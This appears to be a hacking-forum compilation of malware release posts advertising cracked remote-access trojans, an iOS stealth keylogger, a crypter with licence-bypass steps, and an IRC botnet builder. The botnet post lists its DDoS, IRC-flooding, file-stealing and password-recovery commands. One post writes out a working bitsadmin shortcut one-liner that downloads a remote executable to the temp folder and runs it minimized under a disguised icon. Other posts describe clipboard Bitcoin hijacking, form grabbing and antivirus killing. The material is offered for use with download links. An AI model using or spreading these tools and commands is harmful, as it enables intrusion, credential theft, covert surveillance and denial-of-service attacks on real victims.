SkyWyder RAT - CRACKED - TeamViewer Hidden, FormGrabber, Botkiller, Keylogger, Disabler, Antis, Custom Message

Features:
NEW : Teamviewer HIDDEN Tested on XP/VISTA/WIN7/8/10 x86 and x64 !
- Hidden startup from Regedit and msconfig. Persistent installation
- Cryptochange, replace automatly any Bitcoin address copied on the clipboard by your own one
- SkyWyder Rat is able to bypass any Firewall
- Multiple DNS connection, if one of your address is not reachable, the RAT will automatically connect to the next

Formgrabber:
- Very easy to use, just enter a URL and that's it. The Formgrabber take charge of recovering all the form data and will also take a screenshot for each login made and click on the url in question
- Download screenshots and logs in a friendly menu
- Capture date of screenshots
- FULL URL of website captured
- Intelligent keylogger, work only when you need it
- You will be able to download only the screenshots you need

Botkiller:
- Actually our RAT can kill this list of Malwares, include from memory. No matter if the file is crypted, the RAT will detect and kill it quickly without use any % of CPU.

Keylogger:
-Keylogger is hooked in Ring3, so it's never miss any single data, the entire keyboard is hooked without any ms delay.

Disabler:
-Disable the next programs (Without Administration rights!)
(Regedit, CMD, MsConfig, TaskMgr, RestoreSys)

BTC-E Code capture:
-Capture BTC-E Code in RealTime and send it to you very fast with sound notification.

AntivirusKiller:
-With Administration Rights our RAT can kill this list of Anti Virus using a .SYS File from memory (You can also use the UAC bypass with this option)

Fake Message:
-You can configure Title, Message, Icon, Buttons of the fake message and also test it before.



To register the ocx files to fix the missing ocx errors.
1. Open a CMD as administrator.
2. Navigate to the SkyWyder folder.
3. type "Regsvr32 ocxname"
4. Type this on every ocx that is included in the folder.

Credits goes to lostit

DOWNLOAD: SkyWyder - Cracked.rar

[K] iKeyMonitor keylogger for iPad/iPhone/iPod 3.6.2-47

iKeyMonitor is an iOS Keylogger for iPhone/iPad/iPodTouch that logs keystrokes, passwords,
SMS/WhatsApp, websites, screenshots and automatically sends the logs to you by email or FTP.

• Log Keystrokes typed in any app
• Log Passwords in any app
• Log SMS(Text messages)/WhatsApp
• Log web sites visited in Safari
• Capture screenshots in any interval
• Send logs to Email/FTP automatically
• Secretly Monitoring in stealth mode
• Work on iPad/iPhone/iPodTouch
• Password Protected
• Turn on/off monitoring remotely

After installation, please open Safari and enter http://localhost:8888 to access the key logger

In this Version (3.6.2-47) changelog:

• Fixed keystroke logging support for Viber, Kik, Kakao Talk, QQ, VK etc.
• Fixed bug of "upload logs only by wifi"
• Fixed some crash/safe mode/auto restart bugs caused by FTP
• Improved ftp delivery

[NOTE] To activate simply input some numbers as registration key (example: 12345678). 

If after entering the registration key you get prompted to enter a password (but you've never set it before), just close the page and open it again.

[CREDITS] Thanks Fabius for the License!

DEPENDS: cydiasubstrate, zip

Download: ikeymonitor_3.6.2-47_flambob

TRILLIUM CRYPT RELOADED |FUD|NO DEPENDENCY|POLYMORPHIC|PROTECT PROCESS|Anti-MemScan

- Download this pack
- Unzip it in one folder
- Open the "OCX files" folder and run the exe
- Go to hosts file (c:\winddows\system32\drivers\etc) and add "127.0.0.1 electronicarts.pe.hu"
- Open HWID READER.exe
- Generate the hwid with random name (dosen't metter) and copy just the hwid (alphanumeric part like "BFEBFBFF000006FB1653284762")
- Copy it in the hwid.txt into the folder "area"
- Open mongoose you will find into the rar
- Right click on the icon you will find into system try and click on advanced setting
- Change the listeing_port to 80
- Restart mongoose
- Open the program and enjoy it!

I'm not 100% sure about the genuinity of the file I was provided, could be or could be not infected by the same cryter? I used a VM to crack it so be careful and use it you too!

DOWNLOAD AND EXECUTE (NEW METHOD 100% FUD)

It seems I'm the first who found such method to Download and Execute any files.
It was very obvious but seems nobody ever think about it.
First of all here is a demonstration video on youtube :

How it works ?

Well it simply use a shortcut to start a new Windows Shell with two command lines :

• One to download a remote file
• Second to execute the temporary downloaded file

Do it manually :

Just create a new shortcut, from your desktop then enter the following link :

cmd.exe /C "%windir%\system32\bitsadmin.exe /transfert downloader /priority normal http://example.com/test.exe %temp%\tmp.exe & %temp%\tmp.exe

As you can see, the shortcut will execute the Microsoft program bitsadmin in downloader mode to remote download a file and store in temp folder.

Then it will run it.

It is not finish, switch now the shortcut visibility to start minimized.

And you can change the icon with any icons you want (better use an icon index from shell32.dll located in system32 folder)

Have fun !

You can do lot of interesting thing with bitsadmin, I have many other methods to exploit file downloading using this techniques, will write other example later :)

Do it automatically (Lazy method):

As in the above video, download the attached application and voila !

Dowload: µDownloader.rar

[RELEASE] DARKZONE ICON CHANGER | 2 METHODS! [STABLE]

Hello. I just made this simple icon changer using delphi. It has 2 methods to support all executable files!
and of-course no dependencies to run so it will work on all Windows Machines.

DarkZone Icon Changer is a tool helps you to customize the icon file of an executable files (.exe)

Virus Total Scan (False Positive don't worry!)
https://www.virustotal.com/en/file/693e855b907fd2825806f56eb493581494f03bb72cfb30d8a460673ba7632d03/analysis/1481853463/

How to use:
--------------------------------------
1- Choose an executable file (.exe)
2- Choose an icon file (.ico)
3- Choose icon replacing method ( sometimes method
1 doesnt work so choose 2 and vise versa!)
4- Click Apply to make changes!
--------------------------------------

Download:
DarkZone - Icon Changer.rar
Rar Password: DarkZ0Ne.NET


Always check these MD5 and SHA1 hashes of: DarkZone Icon Changer.exe | to make sure its legit and not infected from another users/websites. ^^.
DarkZone Icon Changer.exe
MD5:F324AAB79F80F9BE3261CD5F5D36AA41
SHA1:56E968FD8FFD32B3BAB9A80264E1DFE9681E69DC

Enjoy ^^.

Athena IRC Builder v2.4.0

Features of Athena
 - 10 Intense methods of DDoS
 - Anti-botkiller
 - Independent; requires no .NET framework or any 3rd party libraries
 - File searching and stealing system
 - SmartView (system for giving realistic looking views to your website or the like - ads, youtube, etc)
 - IRC War Attacks/Flooding
 - Multiple (different) methods of startup (registry and non-registry)
 - File, registry, and process persistence
 - Botkill (active botkilling, scans based on heuristics)

IRC Related Commands
!irc.join #channel [key] - Joins a channel
!irc.part #channel - Parts a channel
!irc.raw - Submit a RAW IRC command
!irc.reconnect - Reconnects to IRC after waiting 15 seconds
!irc.silent on/off - Toggles bot output to channel
!irc.sort.country - Separates bots based on location
!irc.sort.privelages - Separates bots based on Admin/User privelages
!irc.sort.gender - Separates laptops and desktops
!irc.sort.os - Separates bots based on operating system
!irc.sort.architecture - Separates bots based on architecture
!irc.sort.dotnet - Separates bots by version of .NET Framework installed

DDoS Commands
[Port 80 is most common for websites]
!ddos.http.slowloris - Attacks a target webserver with many concurrent connections
!ddos.http.rapidget - Sends mass amounts of randomized GET packets to a given target
!ddos.http.rudy - Slowly posts content by the masses to a target webserver
!ddos.http.rapidpost - Sends mass amounts of randomized POST packets to a given target
!ddos.http.slowpost – Holds many concurrent connections to a webserver through POST methods
!ddos.http.arme - Abuses partial content headers in order to harm a target webserver
!ddos.http.bandwith - This is a download based flood targetted torwards larger files and downloadable content on websites
!ddos.layer4.udp - Sends mass amounts of packets containing random data to a target host/ip
!ddos.layer4.ecf - Floods a target with rapid connections and disconnections (Previously named condis) (ECF stands for Established Connection Flooding)
!ddos.stop - Ends any currently running DDoS
(Example: !ddos.http.rapidget  http://website.com/ 80 300)

!ddos.browser http://website.com/ 60 - Floods a website through html scripts and hidden browsers. Effective against sites heavy on browser based scripts.
!ddos.browser.stop - Ends any currently running Browser Based DDoS

!http.hostblock website.com - Blocks a host
!http.status http://website.com/ - Outputs the current status of a given URL (ie. 200 OK, 302 Found, 404 Not Found, etc)

File Searching, Stealing, and Modification Commands
!ftp.upload C:\Archive.rar ftphost.com ftpuser ftppass - Uploads a given file to a given FTP server
!filesearch .exe - Searches entire bot computer for a given file name or piece of a file name, and outputs how many instances of it occured
!filesearch.output .rar - Functionality is the same as above, but the bot outputs the file path of the searched item
!filesearch.stop - Ends any of the existing three above types of file searches

Website View Commands
!view http://website.com/ - Views a given website in a random existing browser visibly
!view.hidden http://website.com/ - Views a given website in a random existing browser hidden
!smartview.add http://website.com/ 1080 300 - Adds a given URL to the 'SmartView' queue
!smartview.del http://website.com/ - Deletes a given URL from the 'SmartView' queue if it exists
!smartview.clear - Clears the entire 'SmartView' queue

Recovery Commands
!recovery.ftp – Outputs existing FTP logins on the bot computer
!recovery.im – Outputs existing IM logins on the bot computer

IRC War Commands
!war.connect irc.server.net 6667 – Connects to a given IRC in multiple sockets
!war.disconnect – Disconnects from a previously connected to IRC
!war.status – Outputs the amount of verified connections to IRC and the status of what the bot is currently doing
!war.raw PRIVMSG #channel :raw message – Submits a RAW IRC command
!war.join #channel channelkey – Joins a channel with an optional key
!war.part #channel part message – Parts a channel with an optional part message
!war.msg user/#channel message here – Sends a message to a given user or channel
!war.notice user/#channel message here – Sends a notice to a given user or channel
!war.invite user – Invites a user to a random channel. Clients that have auto-join on invite are affected badly
!war.ctcp user – Floods a user with CTCP requests. This often disconnects users
!war.dcc user – Floods a user with DCC requests. This often disconnects users
!war.kill.user nickname – Attempts to kill a user from IRC
!war.kill.user.multi nick1 nick2 nick3 - Attempts to kill a list of users from IRC
!war.flood.channel #channel – Floods a given channel
!war.flood.channel.hop #channel – Floods a channel through mass joins and parts
!war.flood.anope – Floods Anope services. Anope will crash if enough bots are used.
!war.stop – Stops an existing flood

Dowload: Athena IRC Builder v2.4.0.rar

QuasarRAT

Free, Open-Source Remote Administration Tool for Windows

Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.

Features

1. TCP network stream (IPv4 & IPv6 support)
2. Fast network serialization (NetSerializer)
3. Compressed (QuickLZ) & Encrypted (AES-128) communication
4. Multi-Threaded
5. UPnP Support
6. No-Ip.com Support
7. Visit Website (hidden & visible)
8. Show Messagebox
9. Task Manager
10. File Manager
11. Startup Manager
12. Remote Desktop
13. Remote Webcam
14. Remote Shell
15. Download & Execute
16. Upload & Execute
17. System Information
18. Computer Commands (Restart, Shutdown, Standby)
19. Keylogger (Unicode Support)
20. Reverse Proxy (SOCKS5)
21. Password Recovery (Common Browsers and FTP Clients)
22. Registry Editor

Requirements

1. .NET Framework 4.0 Client Profile (Download)
2. Supported Operating Systems (32- and 64-bit)
3. Windows XP SP3
4. Windows Server 2003
5. Windows Vista
6. Windows Server 2008
7. Windows 7
8. Windows Server 2012
9. Windows 8/8.1
10. Windows 10

Dowload: QuasarRAT

NODERAT.IO

Hi ax0ners,

First... my previous thread was removed by error and we lost my last tutorial, all your comments and suggestions but don't worry i'll remake it better soon and i'll make different thread to manage the project faster =]

Description:
Noderat.io is full coded in nodejs (web server and client), it use socket.io to exchange data between server and client, ha yes... and it's OPENSOURCE ;)

Noderat.io is not detectable because it's signed with nodejs process recognized as legit application and it can run on all OS without modifications of source code because nodejs is multi platform (Windows all version, Mac OS, linux, Android, etc).

Philosophy:
I wan't to proof how some new technology like nodejs and other frameworks engine like enclose.js, NW.js, cordova, electron, etc create some new problems of security often ignored by OS and AV at this time (These technology are very powerfull, fast and easy to deploy and i think it's a good thing for developer but not enough controled for moment by OS and AV).

Everyone use these new technoly and the community grow fast, the problem is all of this apps are signed legit by all antivirus so i'll write on this more deeper when the project will be more mature.

At the beginning i just wan't to make a remote admin tool as powerfull as possible with a real-time web interface using socket, scalable, clouded and easy movable to controle all my server, raspberry, windows, android, etc from one point, i'm lazy of teamviewer :) ..... but .... when i realized what is possible to do  while i created my project of remote administration tools, i was not able to ignore the security aspect  so i wan't to know the opinion of the community about this new king of security risk. So don't forget ,it's for educational purposes only ;)

To be sure that everyone has understood -> I don't want to make a malware for script kiddies that's why i'll don't help anyone to install, edit, or use this for illegal activity :|

Advantages:
- Code once run on all OS (cloud and client).
- Easy to code (its only javascript).
- Easy to get help and code in team with git.
- Easy to edit and test.
- No need encryption its FUD.
- No need compilation.
- No need Apache or PHP to run the cloud.
- Lot of module exist on nodejs, we can manage them with npm and take benefit from all this repository in a few second:
- Imagine we need to get controle on webcam, just search "nodejs wecam" on google and we often get module of high quality like this.

- Imagine we need to get controle on webcam, just search "nodejs wecam" on google and we often get module of high quality like this.
- Need a file manager ? or an exemple to make your own ? https://www.npmjs.com/package/node-file-manager
- A remote desktop ? https://github.com/citronneur/node-rdpjs
- etc... We take advantage of one of the bigest comunity of javascript developer to add new functionality easier.

Disadvantages:
- Code of client is readable (not compiled) so anyone can reverse your client to get information on you: ip, general password, etc. in clear with notepad ^^, so it will be harder to use it for illegal activity and its better like this, it will discourage lamers to spread this as malware :)
- Size of client (when is compiled) is big (from 12mb with Enclosejs to 80mb with NWjs).
- Need mysql server to run the cloud.
- Need nodejs environment to run the client.

GitHub repository (last version : v1.0.1):
https://github.com/mwesto/nodeRat.Io

Screenshot Last version:

Lost®Door E-Lite v9.1

Lost®Door Is Back Stronger than Ever i proudly present The E-Lite Version 2015
this is the advanced version of Lost Door R.A.T Tested and approved in all Windows
From XP to win 10, with lots of Features which Powerfull to control every Processes
in the Remote machine with no errors.....

Lost®Door would not be what it is today without the invaluable help of everybody
who was kind enough to spend time testing it, using it and reporting bugs...
Lost Door celebrate Today 9 Years Old of it Exsistance We control Your Digital World Since 2007

For Bugs & FeedBack Report E-Mail: Buypriv8@yahoo.com
For Info and Help visit the Blogspot : lost-door.Blogspot.com
Follow on twittern : @Unique_Oussamio
Face Book Page : Facebook.com\ldoorcoder

By UniQue OussamiO - Hackers®Insides Inc.

CHANGE LOG

[+] Cleanner & Freindly intarface 

[+] Stability improved 00.00 % Server's loses

[+] Faster Connection Delai

[+] Client stuck in process while closing Fixed

[+] Icons Changer Tool was added 

[+] Minimize the client is now available (Send to tray)

[+] Start Up way Chnaged and crypted

[+] Codes Updated, Some Replaced By APi's

[+] Data exchange is Encrypted 

[+] Regrouped essentiel Function altogether in the Main Form 

[+] Server Size Reduiced to 46.5 KO
[+] Web Browser Removed Fix the error message (Suscript out of range)

[+] Fast Settings For server Building (Prefix Settings for Begginers)

[+] Stream Webcam ( Fast View) 

[+] Upload [ New Code Faster Transfert]

[+] Lost®Door multilanguages Support [English , Arabic , French , Spanich ,Polish , Italian ,Swidesh and for my Geeks Friends into 1337 ] 

If you Want to Add your Own  Translate the English File upload it & Post Link In our Fan page www.Facebook.com/Ldoorcoder

[+] Tested On : Windows Vista , Windows 7 Ultuimate , Professional & Starter  , Windows XP & Sweet & Windows 8 - 10  - all Service Packs X32Bits

[+] All Reported Bugs were Fixed

Lost Door R.A.T  2007 - 2015

Dowload:  Lost®Door E-Lite v9.1